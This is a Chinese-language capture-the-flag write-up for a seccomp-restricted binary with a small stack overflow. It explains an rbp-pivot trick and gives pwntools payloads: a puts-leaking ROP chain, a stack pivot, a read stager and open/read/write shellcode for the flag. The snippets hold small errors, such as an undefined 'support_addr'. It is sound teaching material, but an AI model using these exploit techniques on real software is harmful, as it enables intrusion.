做的时候没注意到有个后门函数，有点搞复杂了。不过做法还怪有意思的，记录一下。

checksec

先走流程checksec一下，啥保护都没开。但这题在第三页，看来不是道二傻子题，必有蹊跷。我们来仔细看看：

程序逆向分析

漏洞点-mmap可执行内存块

mmap

prot.c

运行结果

image.png

保护机制seccomp

这题的突出特点在于sub_400949，这里使用了seccomp模块。

sub_400949

尽管这题没开那些checksec里的保护机制，但这里整了个狠活儿。

漏洞点-栈溢出

sub_400A16

payload = b''.join([
    cyclic(0x20),
    b'_old_rbp',
    p64(pop_rdi_ret),                   # ------------------
    p64(elf.got['puts']),               #     可用溢出空间
    p64(elf.plt['puts']),               #         0x20
    p64(elf.symbols['_start']),         # ------------------
]))

泄露出puts地址进而获得libc基址，然后再溢出返回到one_gadget就搞定了。但可惜没有0x20，我们得另寻它策。
如前面所说，这题有个后门函数通过它可以把前面的0x28空间利用上，但我做的时候没注意到，所以接下来不会出现到它。

它策

可用的溢出空间只有0x10，这代表我们只能改变一次返回地址。如果我们知道栈地址的话，可以直接返回到buf开头处利用上前面的0x28空间，这样和利用后门函数的思路是一样的，其他师傅讲的很好了，这里不再赘述。既然我们找不到栈，就让栈来找我们。
我们重新审视下溢出点：

read(0, buf, 0x38uLL);

这段代码将0x38个字节从标准输入读到buf处。最有趣的地方来了，buf是哪？我们知道它是一个栈上变量，那它自然应该是在栈上，但具体是哪呢？

对应的汇编代码

阅读汇编代码可以发现，这个位置具体是rbp-20。一般来说这确实是一个栈地址，但我们可以控制rbp。如下构造第一个payload：

target_addr = 0x123000
assistant_addr = target_addr + 0x100

p.sendafter(b'Easy shellcode, have fun!\n', b''.join([
    cyclic(0x20),
    p64(assistant_addr+0x20),
    p64(0x400A1E),
]))

与往常别的题不同，这回我们精心设置了一个rbp的值，然后返回到read之前。在新的一轮执行时，rbp已经指向了0x123020。回想下前面的分析，buf是一块相对rbp变化的地址，新的这次read会控制0x123000-0x123037的0x38字节。此时rsp还在原来栈上，但这不是问题，函数最后的leave会将rsp引向我们新的栈空间，从而完成栈劫持。如下构造第二个payload：

rd =  shellcraft.read(0, target_addr, 0x100)
rd += shellcraft.push('rsi')
rd += shellcraft.ret()
rd =  asm(rd)

p.sendafter(b'Easy shellcode, have fun!\n', b''.join([
    rd.ljust(0x20, b'\x00'),
    p64(0xdeadbeef),
    p64(support_addr),
]))

这里和A师傅的思路就类似了区别在于我们现在准确的知道buf地址，所以不再需要借助后门函数，直接return过去就好了。为了writeup的完整，附上最后一个payload：

sh = shellcraft.open('./flag')
sh += shellcraft.read(3, target_addr, 0x100)
sh += shellcraft.write(1, target_addr, 0x100)
sh =  asm(sh)

p.send(sh)
p.interactive()

这题是真的有意思，小有收获，小有收获。